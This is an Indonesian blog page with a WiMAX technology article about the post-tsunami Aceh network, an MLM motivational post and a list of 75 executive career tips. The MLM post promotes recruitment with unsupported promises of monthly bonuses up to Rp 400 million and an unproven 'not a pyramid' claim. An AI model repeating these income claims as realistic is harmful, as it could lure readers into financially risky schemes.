Berdasarkan pembagian segmen penggunaan teknologi wireless, WiMAX memang ditujukan untuk penggunaan di segmen Metropolitan Area Networks (MAN). MAN biasanya terdiri dari kumpulan LAN, dan meliputi area dalam radius 50 km. Dari segi segmen penggunaan jelas WiMax ditujukan untuk segmen yang sama dengan teknologi kabel tembaga (contohnya DSL).

Masalah yang sering terjadi pada penggunaan teknologi DSL dalam menyediakan akses broadband ke pengguna biasanya sering disebut sebagai “last-mile problems“, atau masalah rentang jarak terakhir antara rumah atau kantor pengguna dan jaringan penyedia layanan broadband. Yang termasuk masalah last-mile bagi pengguna adalah rendahnya laju data broadband akibat terbaginya bandwidth ke banyak pengguna di jaringan.

Rendahnya laju data juga dapat disebabkan oleh jauhnya jarak antara lokasi pengguna dengan sentra koneksi penyedia layanan. Masalah last-mile ini juga dapat merugikan penyedia layanan karena potensi untuk memperluas cakupan pelanggan terkadang mendapat kendala belum terpasangnya infrastruktur fisik ke lokasi calon pelanggan.

Masalah-masalah last-mile itulah yang coba ditanggulangi dengan kehadiran teknologi WiMax yang nirkabel. WiMax, dikenal dengan standar 802.16, dapat melakukan transfer data dengan kecepatan sekitar 70MBps dalam radius jarak sekitar 30 – 50 km untuk menyediakan akses broadband bagi ribuan pelanggan dari sebuah base station.

Infrastruktur wiMax yang tidak tergantung pada infrastruktur kabel yang sudah ada menjadikannya dapat memberikan akses broadband ke daerah-daerah terpencil seperti pedesaan. WiMax menjadi alternatif paling dekat ketersediaannya dibanding harus menunggu perusahaan telekomunikasi memasang teknologi fiber to the home (FTTH) yang mahal.

Instalasi Pra-WiMax Pasca Tsunami Aceh
Contoh paling dekat dari model pemanfaatan WiMax untuk akses tetap adalah infrastruktur yang dibangun untuk menyediakan solusi distribusi akses Internet di Aceh pasca tsunami. Akibat tsunami, praktis sebagian besar infrastruktur kabel telekomunikasi di pantai barat Aceh mengalami kerusakan parah. Padahal, koordinasi bantuan dan operasi pemulihan pasca tsunami sangat memerlukan tersedianya akses Internet dengan kecepatan tinggi. Tidak mungkin dalam waktu singkat bisa dilakukan investasi ulang dengan menggelar kabel baru untuk mengganti yang rusak.

Solusi yang paling mungkin adalah menggunakan infrastruktur nirkabel. Untuk nirkabel, teknologi yang umum digunakan adalah jaringan WiFi yang beroperasi pada frekuensi 2,4GHz. Untuk kasus Aceh, solusi menggunakan WiFi dirasakan kurang memenuhi kebutuhan karena jangkauannya yang sangat terbatas, dan besarnya arus data yang bisa dilewatkan.

Untuk instalasi dengan karakteristik daerah seluas pantai barat Aceh mungkin kinerja maksimal yang dapat dihasilkan hanya sekitar 10 MBps, itu pun harus dengan instalasi bertopologi mesh network (jaring). Untuk dapat menangani kebutuhan kota Banda Aceh kemudian dikembangkan ke kota-kota seperti Meulaboh dan Calang, diperlukan solusi yang lebih stabil dan memiliki bandwidth lebih besar.

Intel Corporation sebagai salah satu donatur proyek Aceh Telco Relief memilih untuk menyediakan solusi perangkat Wireless Broadband Access(WBA) BreezeACCESS VL produksi Alvarion. Perangkat ini bekerja pada frekuensi 5,25 – 5,35 GHz dan 5,725 – 5,850 GHz. Semua frekuensi dianggap ideal karena bebas dari interferensi perangkat 2,4GHz. Solusi tersebut dikategorikan sebagai pra-WiMax karena sudah mengimplementasikan standar 802.16 tetapi masih belum disertifikasi sebagai perangkat WiMax.

Sebagai perangkat Pra-WiMax, WBA juga mendukung akses Internet. Dengan sifatnya yang bisa mengatasi halangan (non-line of sight), base station perangkat ini bisa terletak di luar jangkauan pandangan pengguna akses, atau bisa dipasang di mana pun tanpa harus takut akan terganggu oleh bangunan atau pepohonan.

Perangkat BreezeACCESS menggunakan teknologi OFDM, memiliki bandwidth sekitar 27MBps, dan mampu menjangkau jarak sekitar 15 kilometer. Dengan kemampuannya ini, distribusi akses Internet ke seluruh kota banda Aceh dapat dicukupi dengan membangun tiga atau empat base station, sedangkan untuk kota lain seperti Meulaboh dan Calang dibutuhkan hanya satu base station.

Semua base station terhubung langsung dengan titik terminasi jaringan kabel serat optik bawah laut di pantai Banda Aceh yang telah dibangun oleh Global Marine Systems Limited (GMSL) asal Inggris. Setiap base station menggunakan interbase backhaul yang redundant sehingga jika pada salah satu jalur koneksi terjadi kerusakan, koneksi tidak akan terputus karena base station itu masih dapat bekerja menggunakan jalur cadangan. Di setiap base station akan dipasang perangkat router yang berfungsi sebagai pengatur bandwidth sekaligus firewall. Pengaturan routing menggunakan Border Gateway Protocol (BGP) sehingga proses routing dapat berlangsung secara dinamis dan otomatis.

Selain base station, Intel juga menyiapkan 50 unit CPE (Client Premises Unit, unit yang dipasang di tempat klien) yang akan dipasang di lokasi-lokasi penting, seperti gedung pemerintahan, sekolah, kantor LSM, dan kampus perguruan tinggi. Setiap CPE rata-rata akan menikmati bandwidth lebih dari 2MBps. Setiap CPE kemudian mendistribusikan bandwidth melalui jaringan Ethernet ke sejumlah komputer di setiap lokasi. Untuk akses nirkabel setiap CPE juga dilengkapi dengan sebuah access point, sehingga pengguna dapat mengakses Internet secara nirkabel dari perangkat seperi laptop atau PDA. Terlihat bahwa untuk kasus Aceh, perangkat Wi-Fi tetap digunakan sebagai penunjang dari implementasi teknologi WiMax.

Instalasi dan pemeliharaan dari sistem Pra-WiMax tersebut dilakukan dengan kerjasama dari Yayasan Airputih, yang tim teknisnya aktif membantu pemulihan infrastruktur telekomunikasi data dan telah berada di Aceh sejak tanggal 30 Desember 2004. Tim teknis yang terdiri dari para relawan berkeahlian tinggi ini sampai kini masih berada di Banda Aceh dan beberapa kota di pesisir barat Aceh. Selama satu tahun, Yayasan Airputih akan mengoperasikan dan memelihara jaringan nirkabel ini, sebelum akhirnya menyerahterimakannya kepada masyarakat lokal Aceh yang nantinya juga akan dibekali kemampuan teknis.

WiMax untuk Perangkat Mobile
Standar IEEE 802.16e adalah sebuah amandemen dari spesifikasi dasar IEEE 802.16, dan membidik pasar mobile dengan menambahkan portabilitas dan kemampuan bagi perangkat mobile dengan adapater 802.16e untuk terhubung langsung dengan jaringan WiMax. Standar IEEE 802.16e masih dalam tahap penyusunan, dan diharapkan proses penyelesaiannya dapat berakhir tahun 2006.

Salah satu perkembangan terbaru terkait dengan WiMax mobile adalah kesepakatan yang dicapai oleh Intel dan Nokia pada bulan Juni lalu untuk bekerjasama mendukung pengembangan teknologi WiMax mobile, dan akan saling mendukung agar standarisasi teknologi tersebut dapat segera dirilis.

Dalam butir-butir kesepakatan tersebut, Intel dan Nokia yang sama-sama tergabung dalam WiMax Forum akan bekerjasama dalam masalah-masalah yang berhubungan dengan pengembangan perangkat klien mobile Wimax dan infrastruktur jaringan, serta mempromosikan teknologi tersebut di antara operator dan penyedia layanan. Nokia dan Intel mengusung Wimax mobile sebagai teknologi yang dapat digunakan pada layanan data yang melengkapi jaringan 3G yang sudah ada.

Walaupun banyak yang memprediksi bahwa WiMax akan menggerogoti pasar 3G (hasil riset TelecomViews bahwa pada tahun 2009 menyebutkan lebih dari 40% pasar broadband nirkabel akan dikuasai oleh WiMax), 3G tidak akan hilang dan kemungkinan besar kedua teknologi tersebut akan hidup secara berdampingan. 3G sudah lebih mapan dibanding WiMax, dan sudah banyak dipasang oleh berbagai negara. Selain itu 3G juga memiliki kelebihan dalam menyediakan mobilitas dalam daerah cakupan yang lebih luas. Teknologi 3G juga tidak stagnan, dan terus berkembang. Tahun ini base station 3G akan diupgrade agar mendukung High Speed Dowlink Packet Access(HSDPA) yang akan menjadi feature standar bagi ponsel 3G mulai tahun 2006.

Sementara itu, WiMax memiliki masa depan cerah karena dilihat menawarkan kesempatan bagi operator telekomunikasi alternatif untuk menawarkan layanan broadband dengan harga bersaing untuk pelanggan di daerah metropolitan, dan juga untuk pelanggan di daerah pedesaan atau kota kecil dengan infrastruktur terbatas. Kombinasi dengan teknologi lain seperti VoIP juga dapat menjadi peluang bisnis baru.

Yang jelas di masa depan tidak ada vendor nirkabel atau penyedia layanan yang akan mengikat dirinya pada satu jenis teknologi broadband, atau satu platform jaringan. Yang memegang kendali adalah konsumen. Bagi konsumen yang penting adalah bagaimana kebutuhan (berkomunikasi lewat telepon, membaca e-mail, download content, video streaming) dapat dipenuhi. Pertanyaan tentang “bagaimana” kebutuhan itu akan bisa dipenuhi tidak akan menjadi batasan.

Aral Melintang bagi WiMax
Kendala utama yang menghadang implementasi teknologi WiMax tidak lain adalah masalah kebijakan dan regulasi pemerintah untuk regulasi nirkabel. Rasanya masih belum hilang dari ingatan kita ulasan tentang kisruhnya pengaturan hak lisensi 3G. Kemungkinan keuntungan yang menggiurkan dari penguasaan frekuensi nirkabel boleh jadi akan membuat banyak pihak berebut, dan akhirnya merugikan pengguna yang harus membayar mahal untuk dapat menikmati layanan broadband.

Implementasi teknologi Pre-WiMax di Aceh contohnya, sempat dikuatirkan terhambat oleh masalah yang terkait dengan regulasi. Berdasarkan peraturan pemerintah, penggunaan perangkat WBA yang bekerja di frekuensi 5GHz membutuhkan izin frekuensi yang hanya bisa didapatkan oleh operator telekomunikasi. Pengguna juga dikenai biaya hak penggunaan (BHP) frekuensi yang harus dibayarkan per tahun. Selain itu, bea masuk perangkat dan bea impor lain bisa mencapai 30% dari harga perangkat. Perlu dipikirkan penerapan suatu strategi pengaturan frekuensi nirkabel yang mengedepankan paradigma kepentingan publik sehingga akses broadband menjadi sesuatu yang dapat dinikmati oleh sebanyak-banyaknya masyarakat.

Selain masalah regulasi, WiMax juga mungkin akan butuh waktu sedikit lama sebelum dapat digunakan secara luas oleh masyarakat. Saat ini harga perangkat-perangkat WiMax masih sangat mahal karena masih diproduksi secara terbatas. Selain itu, perangkat-perangkat berteknologi WiMax yang sekarang sudah ada di pasaran juga belum melewati proses sertifikasi dari WiMax Forum sehingga belum dijamin kinerja maupun kompabilitasnya satu sama lain.

Posted by: lathifulamri | December 12, 2007

IMAJINASI, TARGET DAN RENCANA

Berikut kisahnya :

Scott adalah pengusaha peringkat nomor 8 dari Fortune 500. Dan yang sangat-sangat menarik,
dia mengawali tulisannya dengan kisah waktu di SMU dimana ada 2 Steven
yang tidak populer di sekolah. “Steven yang mana ? Steven yang suka
memegang klarinet waktu pertandingan bola, atau Steven yang memegang
tiang bendera ?”. Steven pemegang bendera menjadi pemilik perusahaan
pemasaran ATC dengan omzet puluhan juta US dollar. Sementara Steven
satunya lagi, yang di SMU tidak populer, kemudian dikenal dunia
sebagai Steven SPIELBERG ! (sutradara film Jurassic Park, ET, dll).

Hikmah buku itu adalah, kalau anda dulu gagal dan selalu menjadi
pecundang, tidak berarti selama-lamanya anda menjadi orang yang kalah
terus-menerus. Steven Scott membuktikan hal tersebut. Thomas Edison,
dikeluarkan dari sekolah dasar karena gurunya tidak tahan akan kebo-
dohan Edison. Namun sekarang ribuan paten dibukukan atas nama Thomas
Alva Edison, termasuk penemuan lampu listrik. Dan kalau kita baca
ceritanya, perlu ribuan kali percobaan sebelum lampu listrik bisa
menyala.

Selalu dan selalu, orang-orang yang dulu gagal, bisa melompat
meninggalkan kubangan penderitaannya dengan suatu PERUBAHAN PIKIRAN.
Saat ini anda perhatikan, pekerjaan apakah yang mendatangkan
penghasilan terbanyak ? Pekerjaan yang dikerjakan dengan tangan, atau
dengan pikiran ?. Anda sudah tahu jawabannya. Dan ketika menggunakan
pikiran, jangan sekali-kali batasi imajinasi anda. Imajinasi adalah
suatu berkah yang sangat berharga. Penulis buku, pengarang lagu,
pelukis dan semua orang seni menggali kreasi dengan membiarkan
imajinasinya berkembang. Jadi sebelum anda mengubah diri untuk sukses,
gunakan IMAJINASI anda terlebih dulu. Bayangkan KESUKSESAN itu anda
RAIH. Lalu berikutnya, anda MENYUSUN TARGET dan melaksanakan RENCANA.

Waktu SOS 1 yang saya ikuti, pelatih menanyakan satu-persatu rencana
peserta SOS. Apakah yang mereka ingini dengan terjun ke bisnis MLM ?.
Jawabannya sangat beragam, “Saya ingin punya mobil. Saya ingin keluar
negeri. Saya ingin bonus sepuluh juta sebulan. Dan lain-lain”.

Ketahuilah teman-teman, seorang filsuf pernah mengatakan bahwa, “Anda
adalah APA YANG ANDA PIKIRKAN”.

Kalau anda berpikir ingin bonus 1 juta, maka itulah hasil maksimal
yang akan anda dapatkan dengan bisnis MLM. Kalau anda berpikir ingin
bonus motor, maka memang hanya itulah yang akan anda dapatkan.

Padahal POTENSI BISNIS MLM ITU SANGAT TIDAK TERBATAS. Setiap
distributor harus memiliki dulu apa TARGET BISNIS-nya kelak !. Seorang
UPLINE harus menanyakan apa target downline-nya. Dengan target inilah,
kita menyusun strategi dan rencana kerja kita. Di bulan Januari dulu,
pak Gatot bertanya pada saya tentang target rekrutment. Saya katakan,
dalam 5 bulan saya akan mendapatkan 200 downline resmi. Pak Gatot
menolak, untuk Dwi, target-nya adalah 500 downline resmi dalam 5 bulan
!. Waktu itu saya terkejut. Tidak mungkin. Kata pak Gatot, MUNGKIN !.
Gunakan Imajinasi. Biarkan imajinasi mencari jalan keluar untuk
menutup target ini.

Dan memang saat ini terbukti. Dalam 3.5 bulan sudah ada 277 orang
downline resmi. Dua bulan pasti, pastilah angkanya telah melewati 500
orang. Jika kita bekerja tanpa TARGET, maka kita tidak akan punya
RENCANA, dan bisnis kita hanya akan berputar-putar di tempat saja.
Lalu apa target berikutnya ? Pak Gatot menetapkan, setiap orang yang
masuk jaringan bebasfinansial akan mampu mendapatkan BONUS bulanan Rp
20 juta rupiah setelah bergabung dalam waktu 12 bulan. TEMAN-TEMAN,
inilah TARGET ANDA !. Inilah TARGET KITA BERSAMA !.

Banyak Diamond di Revell yang saat ini memilih pensiun dengan bonus
antara Rp 25 juta hingga Rp 50 juta. Kalau mereka memang berpikir
bahwa itu target mereka, mereka memang akan mendapatkan jumlah itu.
Tidak akan lebih. Ketahuilah, ketika membuat TARGET, kita jangan
mengukur kemampuan kita. Tapi target selalu berada di atas jangkauan
kita. Dan untuk menjangkaunya, gunakan dulu IMAJINASI!. Latih kekuatan
pikiran untuk mendapatkan target itu. Maka selama tidur pun alam bawah
sadar kita akan mencarikan jalan keluar bagi kita untuk mencapai
sasaran tersebut.

Wright bersaudara punya target GILA menciptakan pesawat terbang, dan
target di atas jangkauan itu berhasil. Columbus punya target GILA
menuju INDIA dari arah barat, dan ternyata mendarat di Amerika. John F
Kennedy memberi target GILA kepada NASA untuk mendaratkan orang di
Bulan, dan ternyata tercapai ditahun 1969.

Maka teman-teman, jangan hanya puas dengan target normal. Terimalah
tantangan yang BERANI. Potensi bisnis MLM adalah tidak terbatas. Para
leader di jaringan bebasfinansial telah menerima TARGET GILA dari pak
Gatot untuk mencapai bonus Rp 100 jt dlm waktu 5 tahun dari sekarang !
Apakah anda berani menerimanya ?. Apakah anda tidak ingin kelak setiap
bulan kita mengadakan Leader Meeting di Hotel Frantour-Suffren di
dekat menara Eiffel Paris ?. Kalau target itu tidak ditetapkan dengan
berani, maka hidup kita selamanya tidak akan pernah berubah !.

Setelah TARGET ditetapkan, tulislah di atas kertas. Jadikan itu janji
kita untuk mencapainya. Biarlah imajinasi kita mencari jalan untuk
bisa mencapai target tersebut. Selanjutnya buatlah RENCANA. Kalau anda
ingin tahun depan mencapai bonus Rp. 20 juta, berapakah orang yang
harus anda rekrut hingga tahun depan ? (Gunakan perhitungan
Multiplikasi) . Lalu buatlah rencana, berapa anggota group anda minimal
di bulan pertama, bulan kedua, dst. Tentukan KAPAN anda harus GM,
KAPAN harus SGM, dan akhirnya KAPAN harus SGD Diamond. Bahkan setelah
SGD Diamond, tentukan kapan anda akan naik ke Crown, dan kapan meneri-
ma bonus Rp 50 juta sebulan? Kapan menerima bonus Rp 100 juta sebulan?
Kapan menerima Rp 250 juta sebulan? Dan kapan menerima Rp 400 juta
sebulan ?. Tentukan sendiri TARGET Anda. Anda telah paham bahwa kalau
Anda bekerja keras, upline pun tidak akan bisa menyamai bonus anda.
Kita berada pada MLM murni yang tidak menganut piramida.

Sekarang, apa yang harus ada di benak anda ?

1. Bebaskan IMAJINASI. Jangan di batasi. Anda ingin meraih apa ?.
2. Buat TARGET, Kapan keinginan anda harus tercapai ?.
3. Buat RENCANA dan JALANKAN dengan keyakinan tinggi.

Kita akan bersama-sama meniti tangga keberhasilan kita. Jangan pernah
menyerah. Hidup ini berat, hanya kita lah yang bisa mengubah diri kita
sendiri di masa depan.

NEVER GIVE UP.
NEVER GIVE UP.
NEVER GIVE UP.

Posted by: lathifulamri | December 12, 2007

75 KIAT SUKSES MENJADI SEORANG EKSEKUTIF NOMOR SATU

Jika anda kepengen sukses,menjadi eksekutif muda (eksmud) atau CEO(chief exeutive officer), ikuti langkah saya berikut :

ket: tanda” * ” mempunyai penjelasan yang lebih lanjut, silahkan bertanya langsung ke author lewat comment blog atau lewat chat : keren_meong@yahoo.com dan la.coz.12@gmail.com

 

1. Pilih pekerjaan yang menghasilkan uang berlimpah*

2. Hindari pekerjaan administratif, buru pekerjaan lapangan*

3. Jangan biarkan personalia menentukan karir anda*

4. Cari dan pertahankan keberadaan pelanggan*

5. Jagalah kebugaran anda

6. Biasakan bekerja keras dan mandiri

7. Hindari menulis catatan bernada sumbang*

8. Merenunglah satu jam dalam sehari*

9. Gunakan selalu buku “catatan Ide”*

10. jangan minum dengan kelompok tertentu

11. HIndari kebiasaan merokok di kantor

12. Hilangkan kebiasaan pesta di kantor

13. Jumat adalah hari bebas*

14.. Berjaraklah dengan karyawan bawah yang sebaya*

15. Kenali seseorang dengan mengingat namanya

16. Jalin hubungan yang harmonis*

17. Teleponlah lebih dari sekali*

18. Datanglah lebih awal, pergilah lebih akhir

19. Kerjakan tugas kantor, hanya di kantor

20. Kiat meraih kepercayaan*

21. Hindari pergi bersama atasan*

22. Bersantaplah di kamar hotel*

23. Dalam pesawat, lakukan pekerjaan ringan*

24. Simpanlah data diri orang yang anda kenal

25. Kirim catatan bertulis tangan*

26. Hindari sikap intim dengan atasan*

27. Jangan sembunyikan masalah besar*

28. Praktekkan “WACADAD”*

29. Ambilah jatah cuti anda*

30. Ikuti setiap perintah atasan

31. Jangan mengejutkan atasan*

32. Senangkan para atasan anda

33. Jangan biarkan atasan membuat kesalahan*

34. Pergi ke perpustakaan sekali dalam sebulan*

35. Ciptakan sesuatu yang berarti bagi anda*

36. Pelajari buku- buku ini*

37. “Berdandanlah untuk menari”*

38. Investasikan secukupnya untuk atasan*

39. Tawarkan imbalan lebih kepada karyawan*

40. “Hentikan, Lihat, dan Dengarkan”*

41. Jadilah penegak panji perusahaan*

42. Cari dan isilah” data-GAP”*

43. Kerja keras adalah persiapan diri*

44. Jangan panik atau lepas kendali*

45. Belajarlah berbicara dan menulis*

46. Berilah layanan istimewa kepada setiap orang

47. Jadilah kreditur, jangan debitur*

48. Berikan bonus kejutan*

49. Bersikaplah santun kepada setiap orang

50. Sepuluh ucapan menyenangkan hati karyawan*

51. Kemegahan dan kemenangan adalah buah dari kegigihan*

52. Timbang, ukur dan coba

53. Ketergesaan hasilkan pemborosan*

54. Tingkatkan mutu produk*

55. Tingkatkan kepentingan dalam gagasan, bukan sumbernya*

56. Jauhi politik perkantoran*

57. Selalu tampil segar dan menarik

58. Tandingi, pelajari dan bahagiakan atasan*

59. Jangan melakukan transaksi melampaui anggaran*

60. Jangan remehkan saingan anda*

61. Tandingi karir suka menjatuhkan dengan satu ungkapan*

62. Jadilah anggota kelompok “orang mandiri”*

63. Pelaksanaan harus sempurna, konsep tidak*

64.. Catat dan kumpulkan semua kegagalan anda, dengan cermat dan lapang dada

65. Hidup untuk hari ini, susun rencana untuk besok, lupakan kejadian masa lalu

66. Ceria dan  tertawalah*

67. Sikapilah keluarga sebagai klien no 1*

68. Tanpa tujuan, tidak akan ada kemenangan

69. Ingatlah selalu pasangan hidup bawahan anda*

70. Telaah pekerjaan dari mata karyawan penjualan*

71. Jadilah penjual yang tangguh dan tegar*

72. Jangan jadi pembangun kerajaan*

73. Paculah produk, bukan administrasi*

74. Mengejar adalah belajar dan memimpin*

75. Jangan gusar terhadap pemangsa ide*

ket: tanda” * ” mempunyai penjelasan yang lebih lanjut, silahkan bertanya langsung ke author lewat comment blog atau lewat chat : keren_meong@yahoo.com dan la.coz.12@gmail.com

Categories